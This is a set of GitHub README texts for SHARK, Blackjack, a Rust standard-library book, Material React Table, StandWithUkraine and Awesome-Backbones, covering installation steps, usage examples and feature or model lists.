that's running the EXE. Press CTRL-C and wait a moment or close the terminal. Advanced Installation (Only for developers) ## Advanced Installation (Windows, Linux and macOS) for developers ### Windows 10/11 Users * Install Git for Windows from [here](https://git-scm.com/download/win) if you don't already have it. ## Check out the code ```shell git clone https://github.com/nod-ai/SHARK.git cd SHARK ``` ## Switch to the Correct Branch (IMPORTANT!) Currently SHARK is being rebuilt for [Turbine](https://github.com/nod-ai/SHARK-Turbine) on the `main` branch.
For now you are strongly discouraged from using `main` unless you are working on the rebuild effort, and should not expect the code there to produce a working application for image generation. So for now you'll need to switch over to the `SHARK-1.0` branch and use the stable code. ```shell git checkout SHARK-1.0 ``` The following setup instructions assume you are on this branch. ## Setup your Python VirtualEnvironment and Dependencies ### Windows 10/11 Users * Install the latest Python 3.11.x version from [here](https://www.python.org/downloads/windows/) #### Allow the install script to run in Powershell ```powershell set-executionpolicy remotesigned ``` #### Setup venv and install necessary packages (torch-mlir, nodLabs/Shark, ...) ```powershell ./setup_venv.ps1 #You can re-run this script to get the latest version ``` ### Linux / macOS Users ```shell ./setup_venv.sh source shark1.venv/bin/activate ``` ### Run Stable Diffusion on your device - WebUI #### Windows 10/11 Users ```powershell (shark1.venv) PS C:\g\shark> cd .\apps\stable_diffusion\web\ (shark1.venv) PS C:\g\shark\apps\stable_diffusion\web> python .\index.py ``` #### Linux / macOS Users ```shell (shark1.venv) > cd apps/stable_diffusion/web (shark1.venv) > python index.py ``` #### Access Stable Diffusion on http://localhost:8080/?__theme=dark ### Run Stable Diffusion on your device - Commandline #### Windows 10/11 Users ```powershell (shark1.venv) PS C:\g\shark> python .\apps\stable_diffusion\scripts\main.py --app="txt2img" --precision="fp16" --prompt="tajmahal, snow, sunflowers, oil on canvas" --device="vulkan" ``` #### Linux / macOS Users ```shell python3.11 apps/stable_diffusion/scripts/main.py --app=txt2img --precision=fp16 --device=vulkan --prompt="tajmahal, oil on canvas, sunflowers, 4k, uhd" ``` You can replace `vulkan` with `cpu` to run on your CPU or with `cuda` to run on CUDA devices. If you have multiple Vulkan devices you can address them with `--device=vulkan://1`, etc. The output on an AMD 7900XTX would look something like: ```shell Average step time: 47.19188690185547ms/it Clip Inference time (ms) = 109.531 VAE Inference time (ms): 78.590 Total image generation time: 2.5788655281066895sec ``` Here are some samples generated: Find us on the SHARK Discord server if you have any trouble running it on your hardware. Binary Installation ### Setup a new pip Virtual Environment This step sets up a new VirtualEnv for Python ```shell python --version #Check you have 3.11 on Linux, macOS or Windows Powershell python -m venv shark_venv source shark_venv/bin/activate # Use shark_venv/Scripts/activate on Windows # If you are using conda, create and activate a new conda env # Some older pip installs may not be able to handle the recent PyTorch deps python -m pip install --upgrade pip ``` *macOS Metal* users please install https://sdk.lunarg.com/sdk/download/latest/mac/vulkan-sdk.dmg and enable "System wide install" ### Install SHARK This step pip installs SHARK and related packages on Linux Python 3.8, 3.10 and 3.11 and macOS / Windows Python 3.11 ```shell pip install nodai-shark -f https://nod-ai.github.io/SHARK/package-index/ -f https://llvm.github.io/torch-mlir/package-index/ -f https://nod-ai.github.io/SRT/pip-release-links.html --extra-index-url https://download.pytorch.org/whl/nightly/cpu ``` ### Run shark tank model tests. ```shell pytest tank/test_models.py ``` See tank/README.md for a more detailed walkthrough of our pytest suite and CLI.
### Download and run Resnet50 sample ```shell curl -O https://raw.githubusercontent.com/nod-ai/SHARK/main/shark/examples/shark_inference/resnet50_script.py #Install deps for test script pip install --pre torch torchvision torchaudio tqdm pillow gsutil --extra-index-url https://download.pytorch.org/whl/nightly/cpu python ./resnet50_script.py --device="cpu" #use cuda or vulkan or metal ``` ### Download and run BERT (MiniLM) sample ```shell curl -O https://raw.githubusercontent.com/nod-ai/SHARK/main/shark/examples/shark_inference/minilm_jit.py #Install deps for test script pip install transformers torch --extra-index-url https://download.pytorch.org/whl/nightly/cpu python ./minilm_jit.py --device="cpu" #use cuda or vulkan or metal ``` Development, Testing and Benchmarks If you want to use Python 3.11 with the TF import tools, you can set the environment variables like: Set `USE_IREE=1` to use upstream IREE ``` # PYTHON=python3.11 VENV_DIR=0617_venv IMPORTER=1 ./setup_venv.sh ``` ### Run any of the hundreds of SHARK tank models via the test framework ```shell python -m shark.examples.shark_inference.resnet50_script --device="cpu" # Use gpu | vulkan # Or a pytest pytest tank/test_models.py -k "MiniLM" ``` ### How to use your locally built IREE / Torch-MLIR with SHARK If you are a *Torch-MLIR developer or an IREE developer* and want to test local changes you can uninstall the provided packages with `pip uninstall torch-mlir` and / or `pip uninstall iree-compiler iree-runtime` and build locally with Python bindings and set your PYTHONPATH as mentioned [here](https://github.com/iree-org/iree/tree/main/docs/api_docs/python#install-iree-binaries) for IREE and [here](https://github.com/llvm/torch-mlir/blob/main/development.md#setup-python-environment-to-export-the-built-python-packages) for Torch-MLIR. How to use your locally built Torch-MLIR with SHARK: ```shell 1.) Run `./setup_venv.sh in SHARK` and activate `shark.venv` virtual env. 2.) Run `pip uninstall torch-mlir`. 3.) Go to your local Torch-MLIR directory. 4.) Activate mlir_venv virtual environment. 5.) Run `pip uninstall -r requirements.txt`. 6.) Run `pip install -r requirements.txt`. 7.) Build Torch-MLIR. 8.) Activate shark.venv virtual environment from the Torch-MLIR directory. 9.) Run `export PYTHONPATH=`pwd`/build/tools/torch-mlir/python_packages/torch_mlir:`pwd`/examples` in the Torch-MLIR directory. 10.) Go to the SHARK directory. ``` Now SHARK will use your locally built Torch-MLIR repo. ## Benchmarking Dispatches To produce benchmarks of individual dispatches, you can add `--dispatch_benchmarks=All --dispatch_benchmarks_dir= ` to your pytest command line argument. If you only want to compile specific dispatches, you can specify them with a space-separated string instead of `"All"`. E.g. `--dispatch_benchmarks="0 1 2 10"` For example, to generate and run dispatch benchmarks for MiniLM on CUDA: ``` pytest -k "MiniLM and torch and static and cuda" --benchmark_dispatches=All -s --dispatch_benchmarks_dir=./my_dispatch_benchmarks ``` The given command will populate ` / /` with an `ordered_dispatches.txt` that lists and orders the dispatches and their latencies, as well as folders for each dispatch that contain .mlir, .vmfb, and results of the benchmark for that dispatch. If you want to instead incorporate this into a Python script, you can pass the `dispatch_benchmarks` and `dispatch_benchmarks_dir` arguments when initializing `SharkInference`, and the benchmarks will be generated when compiled.
E.g.: ``` shark_module = SharkInference( mlir_model, device=args.device, mlir_dialect="tm_tensor", dispatch_benchmarks="all", dispatch_benchmarks_dir="results" ) ``` Output will include: - An ordered list ordered-dispatches.txt of all the dispatches with their runtime - Inside the specified directory, there will be a directory for each dispatch (there will be mlir files for all dispatches, but only compiled binaries and benchmark data for the specified dispatches) - An .mlir file containing the dispatch benchmark - A compiled .vmfb file containing the dispatch benchmark - An .mlir file containing just the hal executable - A compiled .vmfb file of the hal executable - A .txt file containing benchmark output See tank/README.md for further instructions on how to run model tests and benchmarks from the SHARK tank. API Reference ### Shark Inference API ``` from shark.shark_importer import SharkImporter # SharkImporter imports mlir file from the torch, tensorflow or tf-lite module. mlir_importer = SharkImporter( torch_module, (input), frontend="torch", #tf, #tf-lite ) torch_mlir, func_name = mlir_importer.import_mlir(tracing_required=True) # SharkInference accepts mlir in linalg, mhlo, and tosa dialect. from shark.shark_inference import SharkInference shark_module = SharkInference(torch_mlir, device="cpu", mlir_dialect="linalg") shark_module.compile() result = shark_module.forward((input)) ``` ### Example demonstrating running MHLO IR. ``` from shark.shark_inference import SharkInference import numpy as np mhlo_ir = r"""builtin.module { func.func @forward(%arg0: tensor<1x4xf32>, %arg1: tensor<4x1xf32>) -> tensor<4x4xf32> { %0 = chlo.broadcast_add %arg0, %arg1 : (tensor<1x4xf32>, tensor<4x1xf32>) -> tensor<4x4xf32> %1 = "mhlo.abs"(%0) : (tensor<4x4xf32>) -> tensor<4x4xf32> return %1 : tensor<4x4xf32> } }""" arg0 = np.ones((1, 4)).astype(np.float32) arg1 = np.ones((4, 1)).astype(np.float32) shark_module = SharkInference(mhlo_ir, device="cpu", mlir_dialect="mhlo") shark_module.compile() result = shark_module.forward((arg0, arg1)) ``` Examples Using the REST API Setting up SHARK for use with Blender Setting up SHARK for use with Koboldcpp Supported and Validated Models SHARK is maintained to support the latest innovations in ML Models: | TF HuggingFace Models | SHARK-CPU | SHARK-CUDA | SHARK-METAL | |---------------------|----------|----------|-------------| | BERT | :green_heart: | :green_heart: | :green_heart: | | DistilBERT | :green_heart: | :green_heart: | :green_heart: | | GPT2 | :green_heart: | :green_heart: | :green_heart: | | BLOOM | :green_heart: | :green_heart: | :green_heart: | | Stable Diffusion | :green_heart: | :green_heart: | :green_heart: | | Vision Transformer | :green_heart: | :green_heart: | :green_heart: | | ResNet50 | :green_heart: | :green_heart: | :green_heart: | For a complete list of the models supported in SHARK, please refer to tank/README.md .
Communication Channels SHARK Discord server : Real-time discussions with the SHARK team and other users GitHub issues : Feature requests, bugs etc Related Projects IREE Project Channels * [Upstream IREE issues](https://github.com/google/iree/issues): Feature requests, bugs, and other work tracking * [Upstream IREE Discord server](https://discord.gg/wEWh6Z9nMU): Daily development discussions with the core team and collaborators * [iree-discuss email list](https://groups.google.com/forum/#!forum/iree-discuss): Announcements, general and low-priority discussion MLIR and Torch-MLIR Project Channels * `#torch-mlir` channel on the LLVM [Discord](https://discord.gg/xS7Z362) - this is the most active communication channel * Torch-MLIR Github issues [here](https://github.com/llvm/torch-mlir/issues) * [`torch-mlir` section](https://llvm.discourse.group/c/projects-that-want-to-become-official-llvm-projects/torch-mlir/41) of LLVM Discourse * Weekly meetings on Mondays 9AM PST. See [here](https://discourse.llvm.org/t/community-meeting-developer-hour-refactoring-recurring-meetings/62575) for more information. * [MLIR topic within LLVM Discourse](https://llvm.discourse.group/c/llvm-project/mlir/31) SHARK and IREE are enabled by and heavily rely on [MLIR](https://mlir.llvm.org). License nod.ai SHARK is licensed under the terms of the Apache 2.0 License with LLVM Exceptions. See LICENSE for more information.;SHARK - High Performance Machine Learning Distribution;deep-learning,machine-learning,mlir,pytorch,amd,apple-silicon,nvidia
nod-ai/SHARK
setzer22/blackjack;Your Rusty 🦀 procedural 3d modeler

ARCHIVED REPOSITORY

This repository is now archived because of a variety of technical and political reasons that made me lose my motivation to continue contributing to the Rust community in my free time.

Blackjack is a procedural modelling application, following in the footsteps of great tools like Houdini or Blender's geometry nodes project. At its core, Blackjack is a simple node-driven interface where you can compose operations to create a 3d mesh in a non-destructive way.

Features and goals

Blackjack does not aim to replace an industry powerhouse such as Houdini. Instead, it aims to provide a less cluttered, more robust and user-friendly experience for a small subset of the features that make these tools a great fit in the world of game development and real-time simulations. Here are the main goals and philosophy behind Blackjack; note that this shows the direction in which things are going, not their current state.

- Procedural polygonal modelling, first and foremost: The main focus in Blackjack is the creation of low-poly procedural assets like the ones one would see in videogames. In particular, surface extraction of volumetric data is not among its goals.
- Flexible node-based interface: Build complex node graphs, create reusable functions, and tweak every parameter in real-time!
- Integration with popular game engines: Export your procedural assets as tiny programs and tweak their parameters at runtime by adding a simple library to your engine of choice.
- Error resilience, crash resistance: When things go wrong, Blackjack will make an effort to respect your time as a user and not lose your work. Errors will be clearly communicated, and fixing any bugs leading to a crash will take the highest priority.

Install and usage

Note: A crates.io version cannot be published due to unreleased dependencies. Blackjack depends on the bleeding-edge version of some crates and requires custom forks for some others. This situation may change once development stabilizes.

Here are the steps to try out the early development version of Blackjack. Binaries and easier installation methods will be provided in the future. The steps below require a complete Rust toolchain using cargo, with a minimum supported Rust version (MSRV) of 1.62.0.

1. Clone this repository, and make sure to download LFS files. On some systems, this may require separately installing a git-lfs [^1] package:

```bash
git clone https://github.com/setzer22/blackjack
git lfs install
git lfs fetch --all
git lfs pull
```

[^1]: Linux users can install git-lfs with their distro's package manager (apt install git-lfs / yum install git-lfs / pacman -S git-lfs). MacOS users using homebrew can use brew install git-lfs. Other users should follow the git-lfs install instructions.

2. Install build dependencies. This may not cover everything; please file an issue or a pull request if you find anything missing:
- Ubuntu/Debian: sudo apt install libfontconfig-dev
- Arch Linux: sudo pacman -S fontconfig
- Fedora: sudo dnf install fontconfig-devel

Note: The fontconfig native dependency is temporary, and will no longer be necessary once this upstream issue is fixed: https://github.com/rust-windowing/winit/issues/2373

3. From the same folder, run cargo run --release --bin blackjack_ui to launch Blackjack.

Usage

Some minimal usage instructions. Please do note that these can and will change frequently during early development:

- The bottom section of the screen is the node graph. Use right click to open the node selector.
- Find a node and spawn it by clicking on it. You can also use the search bar.
- Nodes can be dragged around, and their widgets can be interacted with using the mouse. Dragging the mouse between two nodes' ports will create a connection.
- Use the 'Set active' button under a node to make it render to the screen.

Tech stack

Blackjack is built using Rust 🦀 and stands on the shoulders of giants. Here's a shout-out to some great Rust crates being used in this project:

- rend3 is used for all rendering purposes.
- egui is used as the UI toolkit powering all 2d interaction.
- wgpu, as the base of rend3, is used for all custom visual effects.
- mlua is used to integrate Luau as an extension language.

Tool Maturity

Blackjack is still under active development. Many features are missing and are bound to change. For now, no promises are made with regard to stability, but API breakage will be considered only when absolutely necessary.

Contributing

Contributions are welcome! Before writing a PR, please get in touch by filing an issue 😄;A procedural, node-based modelling tool, made in rust 🦀;[]
setzer22/blackjack
Warrenren/inside-rust-std-library;inside-rust-std-library

The print edition has been published under the title 《深入RUST标准库》 (Inside the Rust Standard Library) and is available for pre-order; you can find it on JD.com. Buying the physical book is a welcome way to support the author.

This book focuses on the analysis of Rust's standard library code. It tries, as far as possible, to give readers a reading path through the standard library source. The analysis covers not only what the code does, but also the requirements behind it and several of the ideas in its design.

- The hallmark of C proficiency is mastery of pointers. Rust's raw pointers are likewise among the most fundamental and most difficult core topics in Rust. The raw pointer and the associated memory modules are therefore used as the starting point of the code analysis: once you are familiar with raw pointers and memory, you naturally gain a deep understanding of the nature of ownership, borrowing and lifetimes, and the hardest part of Rust is behind you.
- Generics are an inseparable part of Rust's syntax, whereas in other languages the absence of generics does not prevent using the language. Generics and trait-based generic bounds are another foundation of Rust code.
- From the analysis of the primitive types, you can see how Rust uses trait syntax to make them infinitely extensible, a demonstration of Rust's more expressive syntactic power.
- Types such as Option/Result are actually defined entirely by the standard library and are not part of the lowest level of the Rust language itself, as the code analysis shows.
- All operators can be overloaded, including across types; operator overloading in Rust reveals many of Rust's coding secrets and tricks.
- Iterators plus closures are the foundation of functional programming, and Iterator adapters form its infrastructure. Rust implements them completely, provides iterators for almost every type, and prepares as well as possible for functional programming.
- The Cell/RefCell/Pin/Lazy code demonstrates how to solve problems creatively within Rust's basic syntax.
- Box/RawVec are the two basic structures for heap memory allocation; used well, there is essentially no need to touch low-level heap allocation and freeing unless you are writing a memory manager.
- Each smart pointer is also an elegant example of Rust implementing a classic data structure.
- Rust's adaptation to different operating systems saves programmers from the repetitive effort that C requires (and the complacency that comes with it).
- Supporting only async/await for asynchronous programming, Future likewise embodies Rust's attitude of doing the most fundamental work.

... ...;The book has been officially published and is currently on pre-order; search for 《深入RUST标准库》 (Inside the Rust Standard Library) on JD.com. This book analyzes the Rust standard library source code and tries to provide a reading path through it.;[]
Warrenren/inside-rust-std-library
KevinVandy/material-react-table;Material React Table V2

View Documentation

About

Quickly create React data tables with Material Design. Built with Material UI V5 and TanStack Table V8.

Want to use Mantine instead of Material UI? Check out Mantine React Table.

Learn More

- Join the Discord server to join in on the development discussion or ask questions
- View the Docs Website
- See all Props, Options, APIs, Components, and Hooks

Quick Examples

- Basic Table (See Default Features)
- Minimal Table (Turn off Features like Pagination, Sorting, Filtering, and Toolbars)
- Advanced Table (See some of the Advanced Features)
- Custom Headless Table (Build your own table markup)
- Dragging / Ordering Examples (Drag and Drop)
- Editing (CRUD) Examples (Create, Edit, and Delete Rows)
- Expanding / Grouping Examples (Sum, Average, Count, etc.)
- Filtering Examples (Faceted Values, Switching Filters, etc.)
- Sticky Pinning Examples (Sticky Headers, Sticky Columns, Sticky Rows, etc.)
- Remote Data Fetching Examples (Server-side Pagination, Sorting, and Filtering)
- Virtualized Examples (10,000 rows at once!)
- Infinite Scrolling (Fetch data as you scroll)
- Localization (i18n) (Over a dozen languages built-in)

View additional storybook examples

Features

All features can easily be enabled/disabled. Fully fleshed-out docs are available for all features.

[x] 30-56kb gzipped - Bundlephobia
[x] Advanced TypeScript Generics Support (TypeScript Optional)
[x] Aggregation and Grouping (Sum, Average, Count, etc.)
[x] Cell Actions (Right-click Context Menu)
[x] Click To Copy Cell Values
[x] Column Action Dropdown Menu
[x] Column Hiding
[x] Column Ordering via Drag'n'Drop
[x] Column Pinning (Freeze Columns)
[x] Column Resizing
[x] Customize Icons
[x] Customize Styling of internal Mui Components
[x] Data Editing and Creating (5 different editing modes)
[x] Density Toggle
[x] Detail Panels (Expansion)
[x] Faceted Value Generation for Filter Options
[x] Filtering (supports client-side and server-side)
[x] Filter Match Highlighting
[x] Full Screen Mode
[x] Global Filtering (Search across all columns, rank by best match)
[x] Header Groups & Footers
[x] Localization (i18n) support
[x] Manage your own state or let the table manage it internally for you
[x] Pagination (supports client-side and server-side)
[x] Row Actions (Your Custom Action Buttons)
[x] Row Numbers
[x] Row Ordering via Drag'n'Drop
[x] Row Pinning
[x] Row Selection (Checkboxes)
[x] SSR compatible
[x] Sorting (supports client-side and server-side)
[x] Theming (Respects your Material UI Theme)
[x] Toolbars (Add your own action buttons)
[x] Tree Data / Expanding Sub-rows
[x] Virtualization (@tanstack/react-virtual)

Getting Started

Installation

View the full Installation Docs

1. Ensure that you have React 18 or later installed
2. Install Peer Dependencies (Material UI V5)

```bash
npm install @mui/material @mui/x-date-pickers @mui/icons-material @emotion/react @emotion/styled
```

3. Install material-react-table

```bash
npm install material-react-table
```

@tanstack/react-table, @tanstack/react-virtual, and @tanstack/match-sorter-utils are internal dependencies, so you do NOT need to install them yourself.
Usage

Read the full usage docs here

```jsx
import { useMemo, useState, useEffect } from 'react';
import {
  MaterialReactTable,
  useMaterialReactTable,
} from 'material-react-table';

//data must be stable reference (useState, useMemo, useQuery, defined outside of component, etc.)
const data = [
  {
    name: 'John',
    age: 30,
  },
  {
    name: 'Sara',
    age: 25,
  },
];

export default function App() {
  const columns = useMemo(
    () => [
      {
        accessorKey: 'name', //simple recommended way to define a column
        header: 'Name',
        muiTableHeadCellProps: { sx: { color: 'green' } }, //optional custom props
        Cell: ({ cell }) => <span>{cell.getValue()}</span>, //optional custom cell render
      },
      {
        accessorFn: (row) => row.age, //alternate way
        id: 'age', //id required if you use accessorFn instead of accessorKey
        header: 'Age',
        Header: () => <i>Age</i>, //optional custom header render
      },
    ],
    [],
  );

  //optionally, you can manage any/all of the table state yourself
  const [rowSelection, setRowSelection] = useState({});

  useEffect(() => {
    //do something when the row selection changes
  }, [rowSelection]);

  const table = useMaterialReactTable({
    columns,
    data,
    enableColumnOrdering: true, //enable some features
    enableRowSelection: true,
    enablePagination: false, //disable a default feature
    onRowSelectionChange: setRowSelection, //hoist internal state to your own state (optional)
    state: { rowSelection }, //manage your own state, pass it back to the table (optional)
  });

  const someEventHandler = () => {
    //read the table state during an event from the table instance
    console.log(table.getState().sorting);
  };

  //other more lightweight MRT sub components also available
  return <MaterialReactTable table={table} />;
}
```

Open in Code Sandbox

Contributors

PRs are welcome, but please discuss in GitHub Discussions or the Discord Server first if it is a large change!

Read the Contributing Guide to learn how to run this project locally.;A fully featured Material UI V5 implementation of TanStack React Table V8, written from the ground up in TypeScript;react,typescript,react-table,material-table,material-ui,data-table,tanstack,datagrid
KevinVandy/material-react-table
vshymanskyy/StandWithUkraine;This repository contains Readme Banners (and some useful docs) that can be used by OSS projects to spread the word, support and help Ukraine in this disastrous situation.

Like this (click to open):

📢 Updates from Ukrainian Open Source Community
🇷🇺 Обращение к гражданам России (An appeal to the citizens of Russia)

For Maintainers and Authors

1. Spread the word. Add one of the banners to your README.md. Badges are also available.
2. Get rid of Russian software and dependencies.
3. Deliver a message to your users (esp. those in Russia) along with your next release. See example here.
4. Follow the cyber safety guide.

Projects that #StandWithUkraine

- AssemblyScript - A variant of TypeScript that compiles to WebAssembly using Binaryen
- Awesome - Awesome lists about all kinds of interesting topics
- MacPaw - A company behind prominent Mac software: CleanMyMac X, Setapp, Gemini 2, The Unarchiver
- AVA.js - A test runner for Node.js that lets you develop with confidence
- Wasm3 - WebAssembly engine
- Rete.js - JavaScript framework for visual programming
- Blynk - IoT platform
- pnpm - Fast, disk space efficient package manager
- PlatformIO - A professional collaborative platform for embedded development
- TinyGSM - A small Arduino library for GSM modules, that just works
- wasm2native - Turn WASI apps into native executables
- node-wasm-run - Run arbitrary WASM/WASI files
- embedded-wasm-apps - Statically-compiled WebAssembly apps on any embedded platform
- php-vast - VAST Ad generator and parser library on PHP
- miband-js - A clean implementation of Mi Band 2 library for Browsers and Node.js, using WebBluetooth API
- mailamie - A simple SMTP catch-all server for testing, written in PHP
- ReStable - jQuery plugin that makes tables responsive, converting them to HTML lists
- phpbench - PHPBench is a benchmark runner for PHP analogous to PHPUnit but for performance rather than correctness
- Codeception - Codeception is a modern full-stack testing framework for PHP. Inspired by BDD
- PHPUnit - PHPUnit is the most commonly used testing framework for PHP
- Payum - Payum is a PHP Payment processing library. It offers everything you need to work with payments
- Soketi - soketi is your simple, fast, and resilient open-source WebSockets server
- PHPMailer - The classic email sending library for PHP
- Awesome Crystal - A collection of awesome Crystal libraries, tools, frameworks and software
- bcrypt.net - Porting of bcrypt.codeplex.com with enhanced security, missing fixes, features and better .net support
- lvgl-rs - Open-source Embedded GUI Library in Rust
- iban-validation - A small library for validating International Bank Account Numbers (IBANs)
- portable-ascii - Portable ASCII library - performance optimized (ascii) string functions for PHP
- comfey - Comfey is a tiny data binding library inspired by React hook useState
- terraform-aws-modules - Collection of Terraform AWS modules supported by the community
- USDCUP.io - Web App that finds and tracks the average price of USD vs CUP in the informal (street) market in Cuba
- CherryPy - A Minimalist Python Web Framework
- Cheroot - A high-performance, pure-Python HTTP server used by CherryPy
- octomachinery - Invisible engine driving octobot machines. Simple, yet powerful. A pythonic framework for making GitHub Apps-powered bots
- Better Go Playground - Go playground alternative with syntax highlight, code autocomplete and WebAssembly support
- Canvacord - Simple & easy to use image manipulation module for beginners
- spaceship-prompt - Minimalistic, powerful and extremely customizable Zsh prompt
- wtfjs - A list of funny and tricky JavaScript examples
- bash-handbook - A handbook for those who want to learn Bash
- vacuum-card - Vacuum cleaner card for Home Assistant Lovelace UI
- purifier-card - Air Purifier card for Home Assistant Lovelace UI
- Moped - A general purpose text editor, small and light
- fluent-vue - Internationalization plugin for Vue.js
- Kap - An open-source screen recorder built with web technology
- bootScore - A powerful, free Bootstrap 5 starter theme for WordPress
- UAdata - Ukrainian data hub with API
- MahApps.Metro - A toolkit for creating modern WPF applications. Lots of goodness out-of-the-box
- MahApps.Metro.IconPacks - Awesome icon packs for WPF and UWP in one library
- GongSolutions.WPF.DragDrop - An easy to use drag'n'drop framework for WPF
- ElectricsEagles - ElectricsEagles drones
- PokeTube - A YouTube player that's focused on privacy
- ProxyManager - A PHP library that aims to provide abstraction for generating various kinds of proxy classes
- FAR.js - Cross-platform File and ARchive Manager in your terminal
- Stacks.js - Develop modern clouds, apps & framework-agnostic libraries, faster
- django-content-settings - The most advanced admin editable setting for Django

...and more than 23000 others;#StandWithUkraine banner and related documents;ukraine,standwithukraine,stoprussionagression,stopputinnow,russia,belarus
vshymanskyy/StandWithUkraine
Fafa-DL/Awesome-Backbones;Awesome backbones for image classification

[![BILIBILI](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/Bilibili.png)](https://space.bilibili.com/46880349) ![](https://img.shields.io/badge/Awesome%20Backbones-v0.6.3-brightgreen) ![](https://img.shields.io/badge/PyTorch-%3E%3Dv1.7.1-green) ![](https://img.shields.io/badge/Python-%3E%3Dv3.6-yellowgreen) [![GitHub forks](https://img.shields.io/github/forks/Fafa-DL/Awesome-Backbones)](https://github.com/Fafa-DL/Awesome-Backbones) [![GitHub stars](https://img.shields.io/github/stars/Fafa-DL/Awesome-Backbones)](https://github.com/Fafa-DL/Awesome-Backbones)

Preface

If training results are poor, first tune the learning rate and batch size; these two hyperparameters strongly affect convergence. Next, start by turning off image augmentation (especially on small datasets), since some augmentation methods can pollute the data. How do you remove augmentation? For example, in the efficientnetv2-b0 config file, train_pipeline can be changed to the following:

```yaml
train_pipeline = [
    dict(type='LoadImageFromFile'),
    dict(
        type='RandomResizedCrop',
        size=192,
        efficientnet_style=True,
        interpolation='bicubic'),
    dict(type='Normalize', **img_norm_cfg),
    dict(type='ImageToTensor', keys=['img']),
    dict(type='ToTensor', keys=['gt_label']),
    dict(type='Collect', keys=['img', 'gt_label'])
]
```

If your dataset has already been resized to the shape the network requires, the Resize operation can be removed as well.

Update log

2023.12.02
- Added the Train Acc and Val loss outputs that many people requested in the issues
- metrics_outputs.csv now saves per-epoch train_loss, train_acc, train_precision, train_recall, train_f1-score, val_loss, val_acc, val_precision, val_recall, val_f1-score for easy plotting
- The terminal now prints both Train and Val metrics instead of Val metrics only
![](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/backbones/terminal.jpg)

2023.08.05
- Added TinyViT (pretrained weights do not match), DeiT3, EdgeNeXt, RevVisionTransformer

2023.03.07
- Added MobileViT, DaViT, RepLKNet, BEiT, EVA, MixMIM, EfficientNetV2

2022.11.20
- Added an option for whether to use the test set as the validation set. If it is not used, a validation set is split from the training set by ratio, randomly picking one fold of the training set as validation (similar to k-fold but not quite; it can be slightly modified to achieve k-fold). See the Training tutorial for details

2022.11.06
- Added HorNet, EfficientFormer, SwinTransformer V2, and MViT models

Test environment

- Pytorch 1.7.1+
- Python 3.6+

Resources

|Dataset|Video tutorials|AI discussion QQ groups|
|---|---|---|
| Flower dataset (extraction code: 0zat) | Click here | Group 1: 78174903 Group 3: 584723646 |

Quick start

1. Follow Environment setup to complete the configuration
2. Download the MobileNetV3-Small weights into datas
3. From a terminal in the Awesome-Backbones folder, run:

```bash
python tools/single_test.py datas/cat-dog.png models/mobilenet/mobilenet_v3_small.py --classes-map datas/imageNet1kAnnotation.txt
```

Tutorials

- Environment setup
- Dataset preparation
- Config file explanation
- Training
- Model evaluation
- Computing FLOPs & Params
- Adding new model components
- Class activation map visualization
- Learning rate schedule visualization
- Data augmentation visualization

Models

[x] LeNet5
[x] AlexNet
[x] VGG
[x] DenseNet
[x] ResNet
[x] Wide-ResNet
[x] ResNeXt
[x] SEResNet
[x] SEResNeXt
[x] RegNet
[x] MobileNetV2
[x] MobileNetV3
[x] ShuffleNetV1
[x] ShuffleNetV2
[x] EfficientNet
[x] RepVGG
[x] Res2Net
[x] ConvNeXt
[x] HRNet
[x] ConvMixer
[x] CSPNet
[x] Swin-Transformer
[x] Vision-Transformer
[x] Transformer-in-Transformer
[x] MLP-Mixer
[x] DeiT
[x] Conformer
[x] T2T-ViT
[x] Twins
[x] PoolFormer
[x] VAN
[x] HorNet
[x] EfficientFormer
[x] Swin Transformer V2
[x] MViT V2
[x] MobileViT
[x] DaViT
[x] RepLKNet
[x] BEiT
[x] EVA
[x] MixMIM
[x] EfficientNetV2

Pretrained weights

| Name | Weights | Name | Weights | Name | Weights |
| :-----: | :-----: | :------: | :------: | :------: | :-----: |
| LeNet5 | None | AlexNet | None | VGG | VGG-11 VGG-13 VGG-16 VGG-19 VGG-11-BN VGG-13-BN VGG-16-BN VGG-19-BN |
| ResNet | ResNet-18 ResNet-34 ResNet-50 ResNet-101 ResNet-152 | ResNetV1C | ResNetV1C-50 ResNetV1C-101 ResNetV1C-152 | ResNetV1D | ResNetV1D-50 ResNetV1D-101 ResNetV1D-152 |
| ResNeXt | ResNeXt-50 ResNeXt-101 ResNeXt-152 | SEResNet | SEResNet-50 SEResNet-101 | SEResNeXt | None |
| RegNet | RegNetX-400MF RegNetX-800MF RegNetX-1.6GF RegNetX-3.2GF RegNetX-4.0GF RegNetX-6.4GF RegNetX-8.0GF RegNetX-12GF | MobileNetV2 | MobileNetV2 | MobileNetV3 | MobileNetV3-Small MobileNetV3-Large |
| ShuffleNetV1 | ShuffleNetV1 | ShuffleNetV2 | ShuffleNetV2 | EfficientNet | EfficientNet-B0 EfficientNet-B1 EfficientNet-B2 EfficientNet-B3 EfficientNet-B4 EfficientNet-B5 EfficientNet-B6 EfficientNet-B7 EfficientNet-B8 |
| RepVGG | RepVGG-A0 RepVGG-A1 RepVGG-A2 RepVGG-B0 RepVGG-B1 RepVGG-A1 RepVGG-B1g2 RepVGG-B1g4 RepVGG-B2 RepVGG-B2g4 RepVGG-B2g4 RepVGG-B3 RepVGG-B3g4 RepVGG-D2se | Res2Net | Res2Net-50-14w-8s Res2Net-50-26w-8s Res2Net-101-26w-4s | ConvNeXt | ConvNeXt-Tiny ConvNeXt-Small ConvNeXt-Base ConvNeXt-Large ConvNeXt-XLarge |
| HRNet | HRNet-W18 HRNet-W30 HRNet-W32 HRNet-W40 HRNet-W44 HRNet-W48 HRNet-W64 | ConvMixer | ConvMixer-768/32 ConvMixer-1024/20 ConvMixer-1536/20 | CSPNet | CSPDarkNet50 CSPResNet50 CSPResNeXt50 |
| Swin Transformer | tiny-224 small-224 base-224 large-224 base-384 large-384 | Vision Transformer | vit_base_p16_224 vit_base_p32_224 vit_large_p16_224 vit_base_p16_384 vit_base_p32_384 vit_large_p16_384 | Transformer in Transformer | TNT-small |
| MLP Mixer | base_p16 large_p16 | Deit | DeiT-tiny DeiT-tiny distilled DeiT-small DeiT-small distilled DeiT-base DeiT-base distilled DeiT-base 384px DeiT-base distilled 384px | Conformer | Conformer-tiny-p16 Conformer-small-p32 Conformer-small-p16 Conformer-base-p16 |
| T2T-ViT | T2T-ViT_t-14 T2T-ViT_t-19 T2T-ViT_t-24 | Twins | PCPVT-small PCPVT-base PCPVT-large SVT-small SVT-base SVT-large | PoolFormer | PoolFormer-S12 PoolFormer-S24 PoolFormer-S36 PoolFormer-M36 PoolFormer-M48 |
